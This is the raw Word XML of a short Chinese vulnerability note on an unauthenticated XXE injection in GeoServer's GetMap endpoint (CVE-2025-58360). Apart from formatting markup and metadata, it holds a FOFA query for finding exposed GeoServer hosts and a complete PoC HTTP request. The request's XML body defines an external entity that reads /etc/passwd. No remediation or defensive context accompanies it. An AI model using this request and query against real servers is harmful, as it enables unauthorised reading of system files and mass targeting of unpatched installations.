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CB866D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GeoServer GetMap 未授权XXE注入漏洞(CVE-2025-58360)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A3B737"/>
    <w:p w14:paraId="205C0A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FOFA：body="/org.geoserver.web.GeoServerBasePage/" || body="class=\"geoserver lebeg" || body="/webapps/geoserver" || (body="window.location.replace(\"web/\");" &amp;&amp; body="geoserver") || title="GeoServer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CBA5DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6013F281"/>
    <w:p w14:paraId="30BFDD30"/>
    <w:p w14:paraId="514017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PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318BBB05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3E5874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56161"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>POST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/geoserver/wms?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service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WMS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version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1.1.0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request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GetMap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layers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topp:states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bbox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-130,24,-66,50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800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400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srs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EPSG:4326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format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image/png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/>
          <w:bCs/>
          <w:color w:val="379969"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FE177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Host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eastAsia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127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671212D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User-Agent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Mozilla/5.0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(Windows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NT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10.0;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Win64;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x64)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AppleWebKit/537.36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(KHTML,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like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Gecko)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Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44375E8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296BC5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>Content-Type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/>
          <w:bCs/>
          <w:color w:val="B27777"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>application/xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DDB4A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</w:p>
    <w:p w14:paraId="24B464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&lt;?xml version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"1.0"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encoding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"UTF-8"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?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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FDF24E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&lt;!DOCTYPE StyledLayerDescriptor [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24711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&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526BACE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&lt;StyledLayerDescriptor version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"1.0.0"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 xml:space="preserve"> xmlns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A83DAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>"http://www.opengis.net/sld"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F84E5A3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&lt;NamedLayer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F19C7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&lt;Name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="353639"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3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xxe;&lt;/Name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52990E99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  &lt;UserStyle/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5573FF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  &lt;/NamedLayer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147043BC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:shd w:val="clear" w:fill="EEF0F3"/>
        <w:spacing w:line="192" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="5A5D64"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D26900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:shd w:val="clear" w:fill="EEF0F3"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;/StyledLayerDescriptor&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489B593">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1389FE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3A0AA7"/>
    <w:rsid w:val="452E7E3E"/>
    <w:rsid w:val="6187078B"/>
    <w:rsid w:val="6AA7701A"/>
    <w:rsid w:val="6EAE5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63</Words>
  <Characters>796</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>846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2025-11-26T06:59:00Z</dcterms:created>
  <dc:creator>m1813</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:06:05Z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eyJoZGlkIjoiMzEwNTM5NzYwMDRjMzkwZTVkZjY2ODkwMGIxNGU0OTUiLCJ1c2VySWQiOiIzMDk0MTQ5NTgifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>EB21C7643FA4491DA44FC9A3C4507A87_12</vt:lpwstr>
  </property>
</Properties>
</file>